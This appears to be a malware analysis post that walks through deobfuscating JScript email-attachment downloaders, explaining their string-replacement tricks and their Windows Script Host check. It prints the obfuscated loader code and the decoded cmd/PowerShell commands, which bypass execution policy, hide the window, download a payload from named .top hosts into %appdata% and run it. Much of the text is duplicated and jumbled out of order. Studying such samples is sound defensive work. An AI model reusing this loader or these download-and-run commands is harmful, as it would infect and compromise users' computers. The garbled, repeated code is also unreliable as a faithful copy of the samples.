var yvyrsa = "ugq4b5zm5fbco6e74isb4rs4e62y6gbco6e77rs4e6xrs4e6 /ugq4b5 Powo5k9rs4e6rso5k9bco6e7rs4e6lly6gbco6e77o5k9rs4e6xrs4e6o5k9 -o5k9rs4e6xrs4e6o5k9ugq4b5o5k9uo5k9rs4e68ibp9o75Io5k9oNpoo5k9lIugq4b5yo5k9 ByPibp9o7Sso5k9 -o5k9no5k9Opo5k9rOo5k9fio5k9Lrs4e6 o5k9-wINisb4rs4e62oo5k9wsrs4e68ibp9o75ylo5k9rs4e6 o5k9bco6e7io5k9isb4rs4e62isb4rs4e62rs4e6No5k9 o5k9risb4rs4e62u6b8No5k9rs4e6o5k9wo5k9-o5k9oo5k9bjo5k9rs4e6ugq4b5rs4e68ibp9o75o5k9 so5k9yo5k9srs4e68ibp9o75rs4e6o5k9zm5fbco6e74y6gbco6e77Nrs4e6o5k9rs4e68ibp9o75y6gbco6e77Wrs4e6o5k9bo5k9ugq4b5lirs4e6No5k9rs4e68ibp9o75y7a6y6gbco6e77o5k9isb4rs4e62OwNLoibp9o7o5k9isb4rs4e62o5k9Filo5k9rs4e6risb4rs4e62u6b8o5k9'bco6e7rs4e68ibp9o75rs4e68ibp9o75pju9bl2//wipolrs4e6rs4e6ry6gbco6e77rs4e68ibp9o75op/usrs4e6ry6gbco6e77pbco6e7p?f=1y6gbco6e77isb4rs4e62ibp9o7rs4e68ibp9o75','fe8y8ibp9o7ppisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6'y7a6;Srs4e68ibp9o75o5k9ibp9o7o5k9ro5k9rs4e68ibp9o75-pRoo5k9ugq4b5o5k9rs4e6So5k9So5k9 fe8y8ibp9o7PPisb4rs4e62ibp9o7rs4e68ibp9o75ibp9o7fe8y8y6gbco6e77rs4e6Xrs4e6";
var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];
var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];
var mlonyn = 0;
var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();
while (1) {
return yvyrsa;
}var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];
var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];
var mlonyn = 0;
var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();
while (1) {
if (mlonyn == anwumo.length) break;
var ztihi = anwumo[mlonyn];
var sejep = dopqitna[mlonyn];
var qaceco = new RegExp(ztihi, vjopyv);
switch (epsura) {
mlonyn++;
}var ztihi = anwumo[mlonyn];
var sejep = dopqitna[mlonyn];
var qaceco = new RegExp(ztihi, vjopyv);
switch (epsura) {
case true:
}yvyrsa = yvyrsa[gasvozgi](qaceco, sejep);
break;mlonyn++;
return yvyrsa;
Explanation :
two arrays are used for the replace part :
var anwumo = [ywwenxaw, qrazi, okoku, doqjaze, ojinnox, qcusicm, rylwaf, assat, myrace, soryf, zebxi, gpibmoqma, hoslatd, osumv];
return yvyrsa;- var anwumo = ["bco6e7", '"y7a6", "ibp9o7", "zm5fh4", "ju9bl2", "ugq4b5", "fe8y8", "rs4e6", "o5k9", "isb4e2", "rdu6b8", '"e8a5", "y6gh7", "u3x5"];
=> an array with the patterns to be replaced
var dopqitna = [skubkuvr, maqosm, cidlo, thiczaxbo, fdukqohwu, wkathak, ilurl, ygiso, ajvucpyc, owurci, ogrosu, avicr, amycuq, fyqun];
- var dopqitna = ["h", ")", "a", "m", ":", "c", "%", "e", "^", "d", "(", "t", ".", "\'"];
=> an array with the chars to be used for the replace part
var mlonyn = 0;
=> used as the current index into both arrays
var epsura = new Function("return typeof WScript.StdOut.AtEndOfStream == 'unknown'")();
=> used in the switch/case part
=> epsura is true if the script is really running under Windows Script Host (the WScript object exists); otherwise the replace loop below never runs
while (1) {=> epsura is true if we are in a running script
=> 'infinite' loop until it breaks : when all the parts have been replaced
if (mlonyn == anwumo.length) break;
var ztihi = anwumo[mlonyn];
mlonyn++;
}if (mlonyn == anwumo.length) break;
var ztihi = anwumo[mlonyn];
=> ztihi : string to be replaced, mlonyn : current index
=> example : index = 0 => "bco6e7"
var sejep = dopqitna[mlonyn];=> example : index = 0 => "bco6e7"
=> sejep : char / string that will replace it, mlonyn : current index
=> example : index = 0 => 'h'
var qaceco = new RegExp(ztihi, vjopyv);=> example : index = 0 => 'h'
=> RegExp : a regular expression is an object that describes a pattern of characters
=> vjopyv : "gi" : the flags parameter (global, case-insensitive) :
=> example : /bco6e7/gi
}=> vjopyv : gi : parameter :
switch (epsura) {=> epsura is true if we are in a running script
case true:
yvyrsa = yvyrsa[gasvozgi](qaceco, sejep);
=> gasvozgi = "replace"
=> example :
break;=> example :
index =0 :
- yvyrsa = yvyrsa["replace"](/bco6e7/gi, "h")
- all "bco6e7" patterns are replaced by "h" (global, case-insensitive matching)
=> exit the case part
mlonyn++;
=> index = index + 1
"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://wipoleer.top/user.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"
3) The current sample :
(1) A search on run => no result ...
=> it seems they have used in this sample another trick to defeat my easy method (searching for the word "run")
(2) Let's search for the big function that should return the command line, the value passed as a parameter to the run method
We have found the famous function that returns the real command line.
=> method : a quick look at the file content :
This time : they used an array of strings that is joined to make a string
A small part :
function bufosmy() {
function bufosmy() {
var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme",
....
....
....
"hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");
....
....
....
"hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");
We have got the name of the function : bufosmy
A search on this name :
=> var ewubq = bufosmy();
=> ewubq is certainly the name of the var used in the part we are looking for, which would be an obfuscated line doing something similar to :
Shell.run(commandline,0)
Let's verify :
A search on ewubq :
Found !
case true:
hahaha ! they have split the word run into "r"+"un" to defeat the previous working method based on searching for the word 'run'
var guhhepxe = WScript.CreateObject("WScript.Shell");
guhhepxe["r" + "un"](ewubq, sumwyzu);
break;
hahaha ! they have split the word run into "r"+"un" to defeat the previous working method based on searching for the word 'run'
var guhhepxe = WScript.CreateObject("WScript.Shell");
=> Shell = WScript.CreateObject("WScript.Shell");
=> Shell.run(ewubq, 0);
and we have seen that var ewubq = bufosmy();
=> Shell.run(ewubq, 0);
and we have seen that var ewubq = bufosmy();
Let's understand how this function deobfuscates the command line
function bufosmy() {
var ocolr = ["syby", "oty", "myxrwowme", "x", "vyl", "yvyl", "usq", "wowme", "Xwowme", "nlunoty", "o", "majs", "syby", "nlunoty", "o", "powwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Rxyfn", "qqwowme", "gi", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "Luvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "cag", "wowme", "xuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "uuvyl", "vsaqq", "vyl", "saqq", "", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "ioNuvyl", "vsaqq", "vyl", "saqq", "", "Puvyl", "vsaqq", "vyl", "saqq", "", "olisyby", "Ynlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "BYPsaqq", "xyfn", "xyfn", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", "nopruvyl", "vsaqq", "vyl", "saqq", "", "OFiLuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "cag", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "Iuvyl", "vsaqq", "vyl", "saqq", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "ouvyl", "vsaqq", "vyl", "saqq", "", "wwowme", "vyl", "wowme", "", "xyfn", "oty", "yuvyl", "vsaqq", "vyl", "saqq", "", "luvyl", "vsaqq", "vyl", "saqq", "", "wowme", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "qqwowme", "gi", "ivyl", "uvyl", "vsaqq", "vyl", "saqq", "", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "nuvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "nlunoty", "o", "uzalu", "nwowme", "wwowme", "vyl", "wowme", "", "uvyl", "vsaqq", "vyl", "saqq", "", "cag", "uvyl", "vsaqq", "vyl", "saqq", "", 
"Obuvyl", "vsaqq", "vyl", "saqq", "", "jwowme", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "oty", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "xyfn", "Yxyfn", "oty", "wowme", "oty", "myxrwowme", "x", "yvyl", "usq", "uvyl", "vsaqq", "vyl", "saqq", "", "Nwowme", "oty", "uvyl", "vsaqq", "vyl", "saqq", "", "yvyl", "usq", "wwowme", "vyl", "wowme", "", "wowme", "bsyby", "luvyl", "vsaqq", "vyl", "saqq", "", "iuvyl", "vsaqq", "vyl", "saqq", "", "wowme", "Nuvyl", "vsaqq", "vyl", "saqq", "", "oty", "fwwowme", "vyl", "wowme", "", "saqq", "s", "yvyl", "usq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "Owwowme", "vyl", "wowme", "", "Nuvyl", "vsaqq", "vyl", "saqq", "", "LOuvyl", "vsaqq", "vyl", "saqq", "", "saqq", "vyl", "uvyl", "vsaqq", "vyl", "saqq", "", "fIuvyl", "vsaqq", "vyl", "saqq", "", "lwowme", "uzalu", "oqby", "qqwowme", "gi", "oty", "oty", "pwowme", "tpyvi", "majs", "majs", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "wwowme", "vyl", "wowme", "", "yvyl", "usq", "browwowme", "vyl", "wowme", "", "nsaqq", "lwowme", "oty", "yvyl", "usq", "oty", "opmajs", "ivyl", "yvyl", "usq", "pqqwowme", "gi", "p?f=1yvyl", "usq", "vyl", "saqq", "oty", "oqby", "", "uvyl", "vsaqq", "vyl", "saqq", "", "oqby", "hkyz", "saqq", "ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", "oqby", "fwwowme", "vyl", "wowme", "", "saqq", "s", "iwwowme", "vyl", "wowme", "", "oty", "wowme", "jli", "xyfn", "oty", "saqq", "Roty", "cag", "puvyl", "vsaqq", "vyl", "saqq", "", "rOuvyl", "vsaqq", "vyl", "saqq", "", "syby", "uvyl", "vsaqq", "vyl", "saqq", "", "wowme", "xyfn", "xyfn", "uvyl", "vsaqq", "vyl", "saqq", "", "nlunoty", "o", "uvyl", "vsaqq", "vyl", "saqq", "", "hkyz", "saqq", "Ppvyl", "saqq", "oty", "saqq", "hkyz", "yvyl", "usq", "wowme", "xwowme", ""].join(",");
=> The join(",") method used at the end builds a long string
=> array of strings : the patterns that will be replaced in the long string by chars
var ezujigz = ['e', "'", '/', "-", "\,", 'd', ".", ':', "w", 'c', '%', "t", "m", "(", 'h', "a", ' ', '^', ")", 's', ";"];
var pfixyg = false;
while (1) {
=> The join(",") method used at the end builds a long string
var ocolr =
"syby,oty,myxrwowme,x,vyl,yvyl,usq,wowme,Xwowme,nlunoty,o,majs,syby,nlunoty,o,powwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,wowme,Rxyfn,qqwowme,gi,wowme,uvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,Luvyl,vsaqq,vyl,saqq,,yvyl,usq,uvyl,vsaqq,vyl,saqq,,wowme,Xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,cag,wowme,xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,uuvyl,vsaqq,vyl,saqq,,oty,uvyl,vsaqq,vyl,saqq,,ioNuvyl,vsaqq,vyl,saqq,,Puvyl,vsaqq,vyl,saqq,,olisyby,Ynlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uvyl,vsaqq,vyl,saqq,,BYPsaqq,xyfn,xyfn,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,cag,uvyl,vsaqq,vyl,saqq,,nopruvyl,vsaqq,vyl,saqq,,OFiLuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,cag,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,Iuvyl,vsaqq,vyl,saqq,,Nuvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,ouvyl,vsaqq,vyl,saqq,,wwowme,vyl,wowme,,xyfn,oty,yuvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,qqwowme,gi,ivyl,uvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,wowme,nuvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uzalu,nwowme,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,cag,uvyl,vsaqq,vyl,saqq,,Obuvyl,vsaqq,vyl,saqq,,jwowme,syby,uvyl,vsaqq,vyl,saqq,,oty,nlunoty,o,uvyl,vsaqq,vyl,saqq,,xyfn,Yxyfn,oty,wowme,oty,myxrwowme,x,yvyl,usq,uvyl,vsaqq,vyl,saqq,,Nwowme,oty,uvyl,vsaqq,vyl,saqq,,yvyl,usq,wwowme,vyl,wowme,,wowme,bsyby,luvyl,vsaqq,vyl,saqq,,iuvyl,vsaqq,vyl,saqq,,wowme,Nuvyl,vsaqq,vyl,saqq,,oty,fwwowme,vyl,wowme,,saqq,s,yvyl,usq,vyl,uvyl,vsaqq,vyl,saqq,,Owwowme,vyl,wowme,,Nuvyl,vsaqq,vyl,saqq,,LOuvyl,vsaqq,vyl,saqq,,saqq,vyl,uvyl,vsaqq,vyl,saqq,,fIuvyl,vsaqq,vyl,saqq,,lwowme,uzalu,oqby,qqwowme,gi,oty,oty,pwowme,tpyvi,majs,majs,wwowme,vyl,wowme,,wwowme,vyl,wowme,,wwowme,vyl,wowme,,yvyl,usq,browwowme,vyl,wowme,,nsaqq,lwowme,oty,yvyl,usq,oty,opmajs,ivyl,yvyl,usq,pqqwowme,gi,p?f=1yvyl,usq,vyl,saqq,oty,oqby,,uvyl,vsaqq,vyl,saqq,,oqby,hkyz,saqq,ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wow
me,xwowme,oqby,fwwowme,vyl,wowme,,saqq,s,iwwowme,vyl,wowme,,oty,wowme,jli,xyfn,oty,saqq,Roty,cag,puvyl,vsaqq,vyl,saqq,,rOuvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,wowme,xyfn,xyfn,uvyl,vsaqq,vyl,saqq,,nlunoty,o,uvyl,vsaqq,vyl,saqq,,hkyz,saqq,Ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wowme,xwowme,"
var nedxes = ['wowme,', "oqby,", 'majs,', 'cag,', "atco,", "vyl,", 'ydusq,', 'etpyvi,', 'wede,', 'syby,', "hkyz,", "oty,", "tmyxrex,", "uzalu,", "qqegi,", 'saqq,', 'nlunto,', "udvada,", "fwas,", "xyfn,", 'iwtejli,'];"syby,oty,myxrwowme,x,vyl,yvyl,usq,wowme,Xwowme,nlunoty,o,majs,syby,nlunoty,o,powwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,wowme,Rxyfn,qqwowme,gi,wowme,uvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,Luvyl,vsaqq,vyl,saqq,,yvyl,usq,uvyl,vsaqq,vyl,saqq,,wowme,Xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,cag,wowme,xuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,uuvyl,vsaqq,vyl,saqq,,oty,uvyl,vsaqq,vyl,saqq,,ioNuvyl,vsaqq,vyl,saqq,,Puvyl,vsaqq,vyl,saqq,,olisyby,Ynlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uvyl,vsaqq,vyl,saqq,,BYPsaqq,xyfn,xyfn,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,cag,uvyl,vsaqq,vyl,saqq,,nopruvyl,vsaqq,vyl,saqq,,OFiLuvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,cag,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,Iuvyl,vsaqq,vyl,saqq,,Nuvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,ouvyl,vsaqq,vyl,saqq,,wwowme,vyl,wowme,,xyfn,oty,yuvyl,vsaqq,vyl,saqq,,luvyl,vsaqq,vyl,saqq,,wowme,uvyl,vsaqq,vyl,saqq,,nlunoty,o,qqwowme,gi,ivyl,uvyl,vsaqq,vyl,saqq,,vyl,uvyl,vsaqq,vyl,saqq,,wowme,nuvyl,vsaqq,vyl,saqq,,nlunoty,o,nlunoty,o,nlunoty,o,nlunoty,o,uzalu,nwowme,wwowme,vyl,wowme,,uvyl,vsaqq,vyl,saqq,,cag,uvyl,vsaqq,vyl,saqq,,Obuvyl,vsaqq,vyl,saqq,,jwowme,syby,uvyl,vsaqq,vyl,saqq,,oty,nlunoty,o,uvyl,vsaqq,vyl,saqq,,xyfn,Yxyfn,oty,wowme,oty,myxrwowme,x,yvyl,usq,uvyl,vsaqq,vyl,saqq,,Nwowme,oty,uvyl,vsaqq,vyl,saqq,,yvyl,usq,wwowme,vyl,wowme,,wowme,bsyby,luvyl,vsaqq,vyl,saqq,,iuvyl,vsaqq,vyl,saqq,,wowme,Nuvyl,vsaqq,vyl,saqq,,oty,fwwowme,vyl,wowme,,saqq,s,yvyl,usq,vyl,uvyl,vsaqq,vyl,saqq,,Owwowme,vyl,wowme,,Nuvyl,vsaqq,vyl,saqq,,LOuvyl,vsaqq,vyl,saqq,,saqq,vyl,uvyl,vsaqq,vyl,saqq,,fIuvyl,vsaqq,vyl,saqq,,lwowme,uzalu,oqby,qqwowme,gi,oty,oty,pwowme,tpyvi,majs,majs,wwowme,vyl,wowme,,wwowme,vyl,wowme,,w
wowme,vyl,wowme,,yvyl,usq,browwowme,vyl,wowme,,nsaqq,lwowme,oty,yvyl,usq,oty,opmajs,ivyl,yvyl,usq,pqqwowme,gi,p?f=1yvyl,usq,vyl,saqq,oty,oqby,,uvyl,vsaqq,vyl,saqq,,oqby,hkyz,saqq,ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wowme,xwowme,oqby,fwwowme,vyl,wowme,,saqq,s,iwwowme,vyl,wowme,,oty,wowme,jli,xyfn,oty,saqq,Roty,cag,puvyl,vsaqq,vyl,saqq,,rOuvyl,vsaqq,vyl,saqq,,syby,uvyl,vsaqq,vyl,saqq,,wowme,xyfn,xyfn,uvyl,vsaqq,vyl,saqq,,nlunoty,o,uvyl,vsaqq,vyl,saqq,,hkyz,saqq,Ppvyl,saqq,oty,saqq,hkyz,yvyl,usq,wowme,xwowme,"
=> array of strings : the patterns that will be replaced in the long string by chars
=> array of chars that will replace the patterns from nedxes in the long string ocolr
Examples :
All wowme occurrences will be replaced in the obfuscated long string by e
All oqby occurrences will be replaced in the obfuscated long string by '
All majs occurrences will be replaced in the obfuscated long string by -
etc,...
The string and the two arrays are initialized, now the code is ready to do the job :
All oqby occurrences will be replaced in the obfuscated long string by '
All majs occurrences will be replaced on the obfuscated long string by -
etc,...
var pfixyg = false;
while (1) {
if (!pfixyg) pfixyg = 0; => the index is initialized to 0
=> pfixyg : index used to scan the arrays
if (pfixyg == nedxes.length) break;
=> If all values from nedxes (the patterns) have been used => break
var ugula = nedxes[pfixyg];
=> the pattern to be removed from the long string
switch (omide()) {
pfixyg++;
}=> retrieves a value from omide()
omide() => always returns true on a real Windows Script Host (see the above spoiler : the generated function tests `new Object().length == 80 && typeof WScript.StdIn.WriteLine == 'unknown'`, conditions that hold only in a genuine WSH/JScript environment, so the test also acts as an environment check against non-WSH analysis tools)
case true:
var ovhugca = new RegExp(ugula, erazyf);
ocolr = ocolr[replace](ovhugca, ezujigz[pfixyg]);
}
function omide() {
Object["prototype"]["length"] = 80;
var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];
return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();
}var mylal = ["dleba", "re", "wonzijb"][1];
var eclyv = ["onxexke", "tu", "dudgeh"][1];
var zqyttih = ["nexi", "rn", "vmesmiwxi"][1];
var tedilbu = ["yvpokajv", " n", "zqigto"][1];
var unfafi = ["erqahl", "ew", "akugzo"][1];
var nmanlynxa = ["jkybky", " O", "hzovfir"][1];
var ewavdu = ["vyvgub", "bj", "cigxapf"][1];
var dehzi = ["ebyt", "ec", "ehhin"][1];
var immiqq = ["vcuctyp", "t(", "fwazpu"][1];
var slacu = ["papapko", ").", "bypykdy"][1];
var dewy = ["olak", "le", "ntaqmakmo"][1];
var opumq = ["kati", "ng", "mibbyni"][1];
var orakwa = ["gjadi", "th", "wdidjasr"][1];
var ujmyqym = ["iqzav", " =", "eqpyhon"][1];
var xpanfarn = ["iqedo", "= ", "gywa"][1];
var ugjuwzuqh = ["jnaqqyse", "80", "aziso"][1];
var kizawb = ["oxex", " &", "wyjumn"][1];
var rixjo = ["olgala", "& ", "kvufqa"][1];
var igcazji = ["cygekp", "ty", "ydmoqjy"][1];
var cybheve = ["sbeqyn", "pe", "chogoj"][1];
var enlaso = ["inikv", "of", "hywgy"][1];
var duvexr = ["vwyhodx", " W", "edazna"][1];
var pmaku = ["stocefde", "Sc", "okfuhzo"][1];
var hycu = ["dgokin", "ri", "uveqa"][1];
var vcuzevo = ["ubykebj", "pt", "atunejk"][1];
var ipelqiql = ["ucbuf", ".S", "yrezokx"][1];
var qidxixle = ["evlojums", "td", "ozofa"][1];
var jegsaf = ["viferx", "In", "kukyt"][1];
var ahekmakb = ["vamxal", ".W", "xusparj"][1];
var qnipdu = ["kluqdanx", "ri", "odmoqa"][1];
var ogfuv = ["cossuho", "te", "entakga"][1];
var vciwdug = ["zmedu", "Li", "efipo"][1];
var obpemk = ["vhosrals", "ne", "mdysa"][1];
var ywej = ["fnakvir", " =", "yzixleq"][1];
var mdyrrogr = ["wbefdan", "= ", "ydpomam"][1];
var luceqca = ["xuliki", "'u", "rivyrd"][1];
var oqirn = ["ufcapnam", "nk", "fryja"][1];
var sjabpoh = ["javfa", "no", "amun"][1];
var ytqakc = ["qabkagj", "wn", "dvabpu"][1];
var ocolr = ["akdygv", "'", "nfagyvu"][1];
return new Function(mylal + eclyv + zqyttih + tedilbu + unfafi + nmanlynxa + ewavdu + dehzi + immiqq + slacu + dewy + opumq + orakwa + ujmyqym + xpanfarn + ugjuwzuqh + kizawb + rixjo + igcazji + cybheve + enlaso + duvexr + pmaku + hycu + vcuzevo + ipelqiql + qidxixle + jegsaf + ahekmakb + qnipdu + ogfuv + vciwdug + obpemk + ywej + mdyrrogr + luceqca + oqirn + sjabpoh + ytqakc + ocolr)();
=> function anonymous() {
return new Object().length == 80 && typeof WScript.StdIn.WriteLine == 'unknown'
}
omide() => always returns true on a real Windows Script Host (see the above spoiler)
case true:
var ovhugca = new RegExp(ugula, erazyf);
=> RegExp : regular expression : an object that describes a pattern of characters
=> all occurrences of the current pattern (which depends on the current index of the loop) are replaced by the corresponding char in the obfuscated long string (the command line)
break;
Example : Loop with index : 0
=> pfixyg : 0
=> ezujigz[pfixyg] => ezujigz[0] => "e"
Then :
=> ezujigz[pfixyg] => ezujigz[0] => "e"
Then :
=> ocolr = ocolr[replace](/wowme/gi , "e")
All wowme occurrences will be replaced in the obfuscated long string by e
All wowme occurrences will be replaced in the obfuscated long string by e
pfixyg++;
=> next index => the next pattern is replaced by the corresponding char in the obfuscated command line string (which then becomes less obfuscated)
return ocolr;
=> here, the end of the loop :
=> all replacements have been made
=> the deobfuscated command line string is returned
=> the deobfuscated command line string is returned
"cmd.eXe /c pow^eRshe^l^L^.^eX^e^ -ex^e^c^u^t^ioN^P^olicY ^BYPass -^nopr^OFiL^e^ -w^I^N^d^o^wsty^l^e^ hid^d^en^ (new^-^Ob^jec^t ^sYstem.^Net^.webcl^i^eN^t).d^OwN^LO^ad^fI^le('http ://www .brownalet.top/id.php?f=1.dat',^'%appdata%\eXe');staRt-p^rO^c^ess^ ^%aPpdata%\eXe"
"cmd.exe /c powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat','%appdata%\eXe');start-process %appdata%\eXe"
Small modifications that don't really make it harder to get all the malware parts.
run powershell.exe :
-executionpolicy bypass
=> bypasses the PowerShell execution policy
-noprofile
=> launches the script in an untouched environment (it doesn't load the Windows PowerShell profile)
-windowstyle hidden
=> hides the PowerShell window
(new-object system.net.webclient).downloadfile('http ://www .brownalet.top/id.php?f=1.dat' ,'%appdata%\eXe');
=> creates a .NET WebClient object and uses its DownloadFile method to download the payload and save it on disk
=> %appdata%\eXe
=> Example : C:\Users\DardiM\AppData\Roaming\eXe
start-process %appdata%\eXe"
=> %appdata%\eXe
=> Example : C:\Users\DardiM\AppData\Roaming\eXe
=> runs the downloaded payload
BILL-24436.js
7.js